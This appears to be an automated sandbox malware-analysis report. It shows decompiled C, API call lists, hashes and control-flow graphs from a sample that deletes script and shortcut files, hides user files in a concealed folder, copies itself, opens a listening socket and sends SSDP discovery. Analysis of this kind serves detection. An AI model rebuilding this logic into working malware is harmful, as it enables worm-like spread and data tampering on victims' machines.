                                                                                  					if(PathFileExistsW( &_v4252) != 0 && CopyFileW(0x414418,  &_v4780, 0) != 0) {
                                                                                  						SetFileAttributesW( &_v4780, 2);
                                                                                  					}
                                                                                  				}
                                                                                  				if(PathFileExistsW( &_v2612) == 0) {
                                                                                  					if((_a16 & 0x000000ff) == 0) {
                                                                                  						E00404980( &_v2612, L"shell32.dll", 8);
                                                                                  						_t224 = _t224 + 0xc;
                                                                                  					} else {
                                                                                  						E00404980( &_v2612, L"shell32.dll", 9);
                                                                                  						_t224 = _t224 + 0xc;
                                                                                  					}
                                                                                  					SetFileAttributesW( &_v2612, 1);
                                                                                  				}
                                                                                  				_v4256 = FindFirstFileW( &_v1044,  &_v3732);
                                                                                  				if(_v4256 == 0xffffffff) {
                                                                                  					L45:
                                                                                  					return _v3133;
                                                                                  				} else {
                                                                                  					_v4860 = L"*.lnk";
                                                                                  					_v4856 = L"*.vbs";
                                                                                  					_v4852 = L"*.js";
                                                                                  					_v4848 = L"*.scr";
                                                                                  					_v4844 = L"*.com";
                                                                                  					_v4840 = L"*.jse";
                                                                                  					_v4836 = L"*.cmd";
                                                                                  					_v4832 = L"*.pif";
                                                                                  					_v4828 = L"*.jar";
                                                                                  					_v4824 = L"*.dll";
                                                                                  					_v4820 = L"*.vbe";
                                                                                  					_v4816 = L"*.bat";
                                                                                  					_v4812 = L"*.inf";
                                                                                  					_v4808 = _v2088;
                                                                                  					_v4804 =  &_v1564;
                                                                                  					_v4800 = L"Thumbs.db";
                                                                                  					_v4796 = L"$RECYCLE.BIN";
                                                                                  					_v4792 = L"desktop.ini";
                                                                                  					_v4788 = L"System Volume Information";
                                                                                  					do {
                                                                                  						if(lstrcmpW( &(_v3732.cFileName), ".") != 0 && lstrcmpW( &(_v3732.cFileName), L"..") != 0) {
                                                                                  							_v4862 = 0;
                                                                                  							_v4868 = 0;
                                                                                  							while(_v4868 < 6) {
                                                                                  								if(lstrcmpiW( &(_v3732.cFileName),  *(_t218 + _v4868 * 4 - 0x12c4)) == 0) {
                                                                                  									_v4862 = 1;
                                                                                  									break;
                                                                                  								}
                                                                                  								_v4868 = _v4868 + 1;
                                                                                  							}
                                                                                  							if((_v4862 & 0x000000ff) == 0) {
                                                                                  								_v4861 = 0;
                                                                                  								_v4872 = 0;
                                                                                  								while(_v4872 < 0xd) {
                                                                                  									if(PathMatchSpecW( &(_v3732.cFileName),  *(_t218 + _v4872 * 4 - 0x12f8)) != 0) {
                                                                                  										wsprintfW( &_v2084, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                  										_t224 = _t224 + 0x10;
                                                                                  										SetFileAttributesW( &_v2084, 0x80);
                                                                                  										DeleteFileW( &_v2084);
                                                                                  										_v4861 = 1;
                                                                                  										break;
                                                                                  									}
                                                                                  									_v4872 = _v4872 + 1;
                                                                                  								}
                                                                                  								if((_v4861 & 0x000000ff) == 0) {
                                                                                  									if(PathFileExistsW( &_v4252) != 0) {
                                                                                  										wsprintfW( &_v3132, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                  										wsprintfW( &_v524, L"%s\\%s\\%s", _a4, _v2088,  &(_v3732.cFileName));
                                                                                  										_t224 = _t224 + 0x24;
                                                                                  										if((_v3732.dwFileAttributes & 0x00000010) == 0) {
                                                                                  											MoveFileExW( &_v3132,  &_v524, 9);
                                                                                  										} else {
                                                                                  											E00404A90( &_v3132,  &_v524);
                                                                                  											_t224 = _t224 + 8;
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								goto L43;
                                                                                  							}
                                                                                  						}
                                                                                  						L43:
                                                                                  					} while (FindNextFileW(_v4256,  &_v3732) != 0);
                                                                                  					FindClose(_v4256);
                                                                                  					goto L45;
                                                                                  				}
                                                                                  			}












































                                                                                  0x00404bd8
                                                                                  0x00404be5
                                                                                  0x00000000
                                                                                  0x00404be7
                                                                                  0x00404bee
                                                                                  0x00404bf8
                                                                                  0x00404c0f
                                                                                  0x00404c2f
                                                                                  0x00404c4f
                                                                                  0x00404c6f
                                                                                  0x00404c88
                                                                                  0x00404c8e
                                                                                  0x00404ca0
                                                                                  0x00404ca9
                                                                                  0x00404cae
                                                                                  0x00404cb1
                                                                                  0x00404cb7
                                                                                  0x00404cc3
                                                                                  0x00404cd1
                                                                                  0x00404cde
                                                                                  0x00404cde
                                                                                  0x00404cc3
                                                                                  0x00404cf3
                                                                                  0x00404d04
                                                                                  0x00404d22
                                                                                  0x00404d22
                                                                                  0x00404d37
                                                                                  0x00404d5a
                                                                                  0x00404d5a
                                                                                  0x00404d37
                                                                                  0x00404d6f
                                                                                  0x00404d77
                                                                                  0x00404d9f
                                                                                  0x00404da4
                                                                                  0x00404d79
                                                                                  0x00404d87
                                                                                  0x00404d8c
                                                                                  0x00404d8c
                                                                                  0x00404db0
                                                                                  0x00404db0
                                                                                  0x00404dca
                                                                                  0x00404dd7
                                                                                  0x0040509f
                                                                                  0x00000000
                                                                                  0x00404ddd
                                                                                  0x00404ddd
                                                                                  0x00404de7
                                                                                  0x00404df1
                                                                                  0x00404dfb
                                                                                  0x00404e05
                                                                                  0x00404e0f
                                                                                  0x00404e19
                                                                                  0x00404e23
                                                                                  0x00404e2d
                                                                                  0x00404e37
                                                                                  0x00404e41
                                                                                  0x00404e4b
                                                                                  0x00404e55
                                                                                  0x00404e65
                                                                                  0x00404e71
                                                                                  0x00404e77
                                                                                  0x00404e81
                                                                                  0x00404e8b
                                                                                  0x00404e95
                                                                                  0x00404e9f
                                                                                  0x00404eb3
                                                                                  0x00404ed0
                                                                                  0x00404ed7
                                                                                  0x00404ef2
                                                                                  0x00404f18
                                                                                  0x00404f1c
                                                                                  0x00000000
                                                                                  0x00404f1c
                                                                                  0x00404eec
                                                                                  0x00404eec
                                                                                  0x00404f30
                                                                                  0x00404f37
                                                                                  0x00404f3e
                                                                                  0x00404f59
                                                                                  0x00404f7f
                                                                                  0x00404f9a
                                                                                  0x00404fa0
                                                                                  0x00404faf
                                                                                  0x00404fbc
                                                                                  0x00404fc2
                                                                                  0x00000000
                                                                                  0x00404fc2
                                                                                  0x00404f53
                                                                                  0x00404f53
                                                                                  0x00404fd9
                                                                                  0x00404fef
                                                                                  0x0040500d
                                                                                  0x00405034
                                                                                  0x0040503a
                                                                                  0x00405046
                                                                                  0x00405070
                                                                                  0x00405048
                                                                                  0x00405056
                                                                                  0x0040505b
                                                                                  0x0040505b
                                                                                  0x00405046
                                                                                  0x00404fef
                                                                                  0x00000000
                                                                                  0x00404fd9
                                                                                  0x00404f32
                                                                                  0x00405076
                                                                                  0x0040508a
                                                                                  0x00405099
                                                                                  0x00000000
                                                                                  0x00405099

                                                                                  APIs
                                                                                  • _chkstk.NTDLL(?,00405220,?,?,?), ref: 00404BD8
                                                                                  • wsprintfW.USER32 ref: 00404C0F
                                                                                  • wsprintfW.USER32 ref: 00404C2F
                                                                                  • wsprintfW.USER32 ref: 00404C4F
                                                                                  • wsprintfW.USER32 ref: 00404C6F
                                                                                  • wsprintfW.USER32 ref: 00404C88
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404C98
                                                                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 00404CD1
                                                                                  • DeleteFileW.KERNEL32(?), ref: 00404CDE
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404CEB
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404CFC
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00404D0F
                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404D22
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404D2F
                                                                                  • CopyFileW.KERNEL32(00414418,?,00000000), ref: 00404D47
                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404D5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
                                                                                  • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$shell32.dll$shell32.dll
                                                                                  • API String ID: 3833403615-1812021906
                                                                                  • Opcode ID: 62579ddd412223121d61bd6eea2e6a24c3e94b8aea53340661bac94d9f0a3f90
                                                                                  • Instruction ID: 56dfbe622999f3f4d946997a069b2a92ca57c1f224be27ae97978ead2f5811f9
                                                                                  • Opcode Fuzzy Hash: 62579ddd412223121d61bd6eea2e6a24c3e94b8aea53340661bac94d9f0a3f90
                                                                                  • Instruction Fuzzy Hash: BBD170B4900219AFCB20DF60DC44BEA77B8BF44304F0485E9F609A6290D7B99BD4CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 417 404a90-404adf CreateDirectoryW wsprintfW FindFirstFileW 418 404ae5-404af9 lstrcmpW 417->418 419 404bbf-404bc2 417->419 420 404b11 418->420 421 404afb-404b0f lstrcmpW 418->421 423 404b8c-404ba2 FindNextFileW 420->423 421->420 422 404b13-404b5c wsprintfW * 2 421->422 424 404b76-404b86 MoveFileExW 422->424 425 404b5e-404b74 call 404a90 422->425 423->418 426 404ba8-404bb9 FindClose RemoveDirectoryW 423->426 424->423 425->423 426->419
                                                                                  C-Code - Quality: 100%
                                                                                  			E00404A90(WCHAR* _a4, char _a8) {
                                                                                  				short _v524;
                                                                                  				struct _WIN32_FIND_DATAW _v1116;
                                                                                  				void* _v1120;
                                                                                  				short _v1644;
                                                                                  				short _v2164;
                                                                                  				void* _t29;
                                                                                  				void* _t60;
                                                                                  				void* _t61;
                                                                                  
                                                                                  				_t1 =  &_a8; // 0x40505b
                                                                                  				CreateDirectoryW( *_t1, 0);
                                                                                  				wsprintfW( &_v524, L"%s\\*", _a4);
                                                                                  				_t61 = _t60 + 0xc;
                                                                                  				_t29 = FindFirstFileW( &_v524,  &_v1116);
                                                                                  				_v1120 = _t29;
                                                                                  				if(_v1120 == 0xffffffff) {
                                                                                  					return _t29;
                                                                                  				} else {
                                                                                  					goto L1;
                                                                                  				}
                                                                                  				do {
                                                                                  					L1:
                                                                                  					if(lstrcmpW( &(_v1116.cFileName), ".") != 0 && lstrcmpW( &(_v1116.cFileName), L"..") != 0) {
                                                                                  						wsprintfW( &_v1644, L"%s\\%s", _a4,  &(_v1116.cFileName));
                                                                                  						_t14 =  &_a8; // 0x40505b
                                                                                  						wsprintfW( &_v2164, L"%s\\%s",  *_t14,  &(_v1116.cFileName));
                                                                                  						_t61 = _t61 + 0x20;
                                                                                  						if((_v1116.dwFileAttributes & 0x00000010) == 0) {
                                                                                  							MoveFileExW( &_v1644,  &_v2164, 9);
                                                                                  						} else {
                                                                                  							E00404A90( &_v1644,  &_v2164);
                                                                                  							_t61 = _t61 + 8;
                                                                                  						}
                                                                                  					}
                                                                                  				} while (FindNextFileW(_v1120,  &_v1116) != 0);
                                                                                  				FindClose(_v1120);
                                                                                  				return RemoveDirectoryW(_a4);
                                                                                  			}











                                                                                  0x00404a9b
                                                                                  0x00404a9f
                                                                                  0x00404ab5
                                                                                  0x00404abb
                                                                                  0x00404acc
                                                                                  0x00404ad2
                                                                                  0x00404adf
                                                                                  0x00404bc2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404ae5
                                                                                  0x00404ae5
                                                                                  0x00404af9
                                                                                  0x00404b2a
                                                                                  0x00404b3a
                                                                                  0x00404b4a
                                                                                  0x00404b50
                                                                                  0x00404b5c
                                                                                  0x00404b86
                                                                                  0x00404b5e
                                                                                  0x00404b6c
                                                                                  0x00404b71
                                                                                  0x00404b71
                                                                                  0x00404b5c
                                                                                  0x00404ba0
                                                                                  0x00404baf
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNEL32([P@,00000000), ref: 00404A9F
                                                                                  • wsprintfW.USER32 ref: 00404AB5
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00404ACC
                                                                                  • lstrcmpW.KERNEL32(?,00411594), ref: 00404AF1
                                                                                  • lstrcmpW.KERNEL32(?,00411598), ref: 00404B07
                                                                                  • wsprintfW.USER32 ref: 00404B2A
                                                                                  • wsprintfW.USER32 ref: 00404B4A
                                                                                  • MoveFileExW.KERNEL32(?,?,00000009), ref: 00404B86
                                                                                  • FindNextFileW.KERNEL32(000000FF,?), ref: 00404B9A
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00404BAF
                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00404BB9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                  • String ID: %s\%s$%s\%s$%s\*$[P@
                                                                                  • API String ID: 92872011-505645206
                                                                                  • Opcode ID: b47613f4efcc78fc372a5197ceb720a83a34bcc65ffc30f7c0cf28f594637780
                                                                                  • Instruction ID: 4312a352e9e7f9f4b9df3eadcbdfd99b35f9a62cedde5f9254868b67503f5fd5
                                                                                  • Opcode Fuzzy Hash: b47613f4efcc78fc372a5197ceb720a83a34bcc65ffc30f7c0cf28f594637780
                                                                                  • Instruction Fuzzy Hash: 5D3178B5900218ABCB10DBA0DC88FEA7778AB88311F40C599F709A7155DB75EAC4CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 553 40eea0-40eeb2 call 408e40 556 40f026-40f02a 553->556 557 40eeb8-40eef0 GetSystemInfo InitializeCriticalSection CreateEventA 553->557 558 40eef6-40ef09 CreateIoCompletionPort 557->558 559 40f01f-40f024 call 40e480 557->559 558->559 560 40ef0f-40ef19 call 40bea0 558->560 559->556 560->559 565 40ef1f-40ef37 WSASocketA 560->565 565->559 566 40ef3d-40efa0 setsockopt htons bind 565->566 566->559 567 40efa6-40efb8 listen 566->567 567->559 568 40efba-40efc5 WSACreateEvent 567->568 568->559 569 40efc7-40efd7 WSAEventSelect 568->569 569->559 570 40efd9-40efdf 569->570 571 40efe1-40effd call 40bf50 570->571 572 40efff-40f01e call 40bf50 570->572 571->572
                                                                                  C-Code - Quality: 45%
                                                                                  			E0040EEA0(void* __esi) {
                                                                                  				struct _SYSTEM_INFO _v36;
                                                                                  				short _v40;
                                                                                  				char _v77;
                                                                                  				short _v82;
                                                                                  				short _v86;
                                                                                  				short _v90;
                                                                                  				short _v92;
                                                                                  				short _v94;
                                                                                  				short _v96;
                                                                                  				short _v98;
                                                                                  				char _v100;
                                                                                  				void* __edi;
                                                                                  				intOrPtr* _t30;
                                                                                  				void* _t33;
                                                                                  				void* _t36;
                                                                                  				intOrPtr _t37;
                                                                                  				short _t39;
                                                                                  				intOrPtr _t40;
                                                                                  				intOrPtr* _t54;
                                                                                  				void* _t56;
                                                                                  				void* _t58;
                                                                                  				void* _t59;
                                                                                  
                                                                                  				_t30 = E00408E40(0x4c);
                                                                                  				_t54 = _t30;
                                                                                  				_t59 = _t58 + 4;
                                                                                  				if(_t54 == 0) {
                                                                                  					return _t30;
                                                                                  				} else {
                                                                                  					 *_t54 = 0x494f4350;
                                                                                  					GetSystemInfo( &_v36);
                                                                                  					_t45 = _v36.dwNumberOfProcessors;
                                                                                  					_t3 = _t54 + 0x20; // 0x20
                                                                                  					 *((intOrPtr*)(_t54 + 4)) = _v36.dwNumberOfProcessors + _t45;
                                                                                  					InitializeCriticalSection(_t3);
                                                                                  					_t33 = CreateEventA(0, 1, 0, 0);
                                                                                  					 *(_t54 + 0x10) = _t33;
                                                                                  					if(_t33 == 0) {
                                                                                  						L12:
                                                                                  						E0040E480(_t54);
                                                                                  						return 0;
                                                                                  					}
                                                                                  					_t36 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
                                                                                  					 *(_t54 + 8) = _t36;
                                                                                  					if(_t36 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_t37 = E0040BEA0(_t45);
                                                                                  					 *((intOrPtr*)(_t54 + 0xc)) = _t37;
                                                                                  					if(_t37 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSASocketA(2, 1, 6, 0, 0, 1);
                                                                                  					 *((intOrPtr*)(_t54 + 0x14)) = _t37;
                                                                                  					if(_t37 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_v77 = 1;
                                                                                  					__imp__#21(_t37, 0xffff, 4,  &_v77, 1);
                                                                                  					_v94 = 0;
                                                                                  					_v90 = 0;
                                                                                  					_v86 = 0;
                                                                                  					_v82 = 0;
                                                                                  					_t39 = _v40;
                                                                                  					_v96 = 2;
                                                                                  					_v92 = _t39;
                                                                                  					__imp__#9(_v36.dwOemId);
                                                                                  					_v98 = _t39;
                                                                                  					_t40 =  *((intOrPtr*)(_t54 + 0x14));
                                                                                  					__imp__#2(_t40,  &_v100, 0x10);
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__#13( *((intOrPtr*)(_t54 + 0x14)), 0x7fffffff);
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSACreateEvent();
                                                                                  					 *((intOrPtr*)(_t54 + 0x18)) = _t40;
                                                                                  					if(_t40 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSAEventSelect( *((intOrPtr*)(_t54 + 0x14)), _t40, 8);
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_t56 = 0;
                                                                                  					if( *((intOrPtr*)(_t54 + 4)) > 0) {
                                                                                  						do {
                                                                                  							E0040BF50( *((intOrPtr*)(_t54 + 0xc)), 0, E0040EDD0, _t54, 0, 0);
                                                                                  							_t56 = _t56 + 1;
                                                                                  							_t59 = _t59 + 0x18;
                                                                                  						} while (_t56 <  *((intOrPtr*)(_t54 + 4)));
                                                                                  					}
                                                                                  					E0040BF50( *((intOrPtr*)(_t54 + 0xc)), 0, E0040E7A0, _t54, 0, 0);
                                                                                  					return _t54;
                                                                                  				}
                                                                                  			}

























                                                                                  0x0040eea6
                                                                                  0x0040eeab
                                                                                  0x0040eead
                                                                                  0x0040eeb2
                                                                                  0x0040f02a
                                                                                  0x0040eeb8
                                                                                  0x0040eebd
                                                                                  0x0040eec3
                                                                                  0x0040eec9
                                                                                  0x0040eecd
                                                                                  0x0040eed4
                                                                                  0x0040eed7
                                                                                  0x0040eee5
                                                                                  0x0040eeeb
                                                                                  0x0040eef0
                                                                                  0x0040f01f
                                                                                  0x0040f01f
                                                                                  0x00000000
                                                                                  0x0040f024
                                                                                  0x0040eefe
                                                                                  0x0040ef04
                                                                                  0x0040ef09
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040ef0f
                                                                                  0x0040ef14
                                                                                  0x0040ef19
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040ef2b
                                                                                  0x0040ef31
                                                                                  0x0040ef37
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040ef4c
                                                                                  0x0040ef51
                                                                                  0x0040ef5d
                                                                                  0x0040ef61
                                                                                  0x0040ef65
                                                                                  0x0040ef69
                                                                                  0x0040ef6e
                                                                                  0x0040ef78
                                                                                  0x0040ef7d
                                                                                  0x0040ef81
                                                                                  0x0040ef8d
                                                                                  0x0040ef92
                                                                                  0x0040ef97
                                                                                  0x0040efa0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040efaf
                                                                                  0x0040efb8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040efba
                                                                                  0x0040efc0
                                                                                  0x0040efc5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040efce
                                                                                  0x0040efd7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040efda
                                                                                  0x0040efdf
                                                                                  0x0040efe1
                                                                                  0x0040eff1
                                                                                  0x0040eff6
                                                                                  0x0040eff7
                                                                                  0x0040effa
                                                                                  0x0040efe1
                                                                                  0x0040f00f
                                                                                  0x0040f01e
                                                                                  0x0040f01e

                                                                                  APIs
                                                                                  • GetSystemInfo.KERNEL32(?), ref: 0040EEC3
                                                                                  • InitializeCriticalSection.KERNEL32(00000020), ref: 0040EED7
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040EEE5
                                                                                  • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040EEFE
                                                                                    • Part of subcall function 0040BEA0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040BEBE
                                                                                  • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 0040EF2B
                                                                                  • setsockopt.WS2_32 ref: 0040EF51
                                                                                  • htons.WS2_32(?), ref: 0040EF81
                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040EF97
                                                                                  • listen.WS2_32(?,7FFFFFFF), ref: 0040EFAF
                                                                                  • WSACreateEvent.WS2_32 ref: 0040EFBA
                                                                                  • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040EFCE
                                                                                    • Part of subcall function 0040BF50: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BF74
                                                                                    • Part of subcall function 0040BF50: CreateThread.KERNEL32 ref: 0040BFCF
                                                                                    • Part of subcall function 0040BF50: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C00C
                                                                                    • Part of subcall function 0040BF50: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040C017
                                                                                    • Part of subcall function 0040BF50: DuplicateHandle.KERNEL32(00000000), ref: 0040C01E
                                                                                    • Part of subcall function 0040BF50: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040C032
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 1603358586-0
                                                                                  • Opcode ID: 3a48ff714123f67728488ebd241aa5cbce844eebc6b7f1e346220b8f1150fb3f
                                                                                  • Instruction ID: 70d9824073996a0ff4c6e74931008e54e86ddc456e6e2338b5ab093a1f0703e2
                                                                                  • Opcode Fuzzy Hash: 3a48ff714123f67728488ebd241aa5cbce844eebc6b7f1e346220b8f1150fb3f
                                                                                  • Instruction Fuzzy Hash: DD41A470240702BFD3209F64DC4AF5AB7A5BF88710F108A3AF668E66D1D7B4E454C799
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040C94A
                                                                                  • htons.WS2_32(0000076C), ref: 0040C980
                                                                                  • inet_addr.WS2_32(239.255.255.250), ref: 0040C98F
                                                                                  • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C9AD
                                                                                    • Part of subcall function 00409880: htons.WS2_32(00000050), ref: 004098AD
                                                                                    • Part of subcall function 00409880: socket.WS2_32(00000002,00000001,00000000), ref: 004098CD
                                                                                    • Part of subcall function 00409880: connect.WS2_32(000000FF,?,00000010), ref: 004098E6
                                                                                    • Part of subcall function 00409880: getsockname.WS2_32(000000FF,?,00000010), ref: 00409918
                                                                                  • bind.WS2_32(000000FF,?,00000010), ref: 0040C9E3
                                                                                  • lstrlenA.KERNEL32(004105A0,00000000,?,00000010), ref: 0040C9FC
                                                                                  • sendto.WS2_32(000000FF,004105A0,00000000), ref: 0040CA0B
                                                                                  • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040CA25
                                                                                    • Part of subcall function 0040C840: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C88E
                                                                                    • Part of subcall function 0040C840: Sleep.KERNEL32(000003E8), ref: 0040C89E
                                                                                    • Part of subcall function 0040C840: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C8BB
                                                                                    • Part of subcall function 0040C840: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C8D1
                                                                                    • Part of subcall function 0040C840: StrChrA.SHLWAPI(?,0000000D), ref: 0040C8FE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                  • String ID: 239.255.255.250
                                                                                  • API String ID: 726339449-2186272203
                                                                                  • Opcode ID: f43b03ae6e4f538bd75ce9ea370b17764c9772fec20ce54065493977abab1f4b
                                                                                  • Instruction ID: b865f0e7113cd30ffca57b294248847536cf2bc14de9108ff1861f92315d7120
                                                                                  • Opcode Fuzzy Hash: f43b03ae6e4f538bd75ce9ea370b17764c9772fec20ce54065493977abab1f4b
                                                                                  • Instruction Fuzzy Hash: D241F8B4E10209EFDB04DFE4D889BEEBBB5EF48304F108169E905B7290D7B55A44CB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 44%
                                                                                  			E0040DC40(intOrPtr __edi, void* __esi) {
                                                                                  				short _v8;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				short _v22;
                                                                                  				short _v24;
                                                                                  				short _v26;
                                                                                  				short _v28;
                                                                                  				short _v30;
                                                                                  				char _v33;
                                                                                  				char _v52;
                                                                                  				void* __ebx;
                                                                                  				void* _t21;
                                                                                  				short _t24;
                                                                                  				void* _t25;
                                                                                  				void* _t30;
                                                                                  				void* _t31;
                                                                                  				intOrPtr _t38;
                                                                                  				void* _t39;
                                                                                  
                                                                                  				_t39 = __esi;
                                                                                  				_t38 = __edi;
                                                                                  				if(__esi == 0 || __edi == 0) {
                                                                                  					return 0;
                                                                                  				} else {
                                                                                  					_t31 = E00408E40(0x24);
                                                                                  					 *_t31 = 0x756470;
                                                                                  					 *(_t31 + 4) = 0;
                                                                                  					_t21 = CreateEventA(0, 1, 0, 0);
                                                                                  					 *(_t31 + 0x10) = _t21;
                                                                                  					__imp__#23(2, 2, 0x11, _t30);
                                                                                  					 *(_t31 + 8) = _t21;
                                                                                  					if(_t21 == 0xffffffff) {
                                                                                  						E0040E0A0(_t31, __edi);
                                                                                  						_t31 = 0;
                                                                                  					}
                                                                                  					if(_t31 == 0) {
                                                                                  						L8:
                                                                                  						return _t31;
                                                                                  					}
                                                                                  					_v26 = 0;
                                                                                  					_v22 = 0;
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_t24 = _v8;
                                                                                  					_v24 = _t24;
                                                                                  					_v28 = 2;
                                                                                  					__imp__#9(_t39);
                                                                                  					_v30 = _t24;
                                                                                  					_v33 = 1;
                                                                                  					_t25 =  *(_t31 + 8);
                                                                                  					__imp__#21(_t25, 0xffff, 4,  &_v33, 1);
                                                                                  					__imp__#2( *(_t31 + 8),  &_v52, 0x10);
                                                                                  					if(_t25 != 0xffffffff) {
                                                                                  						 *((intOrPtr*)(_t31 + 0xc)) = _t38;
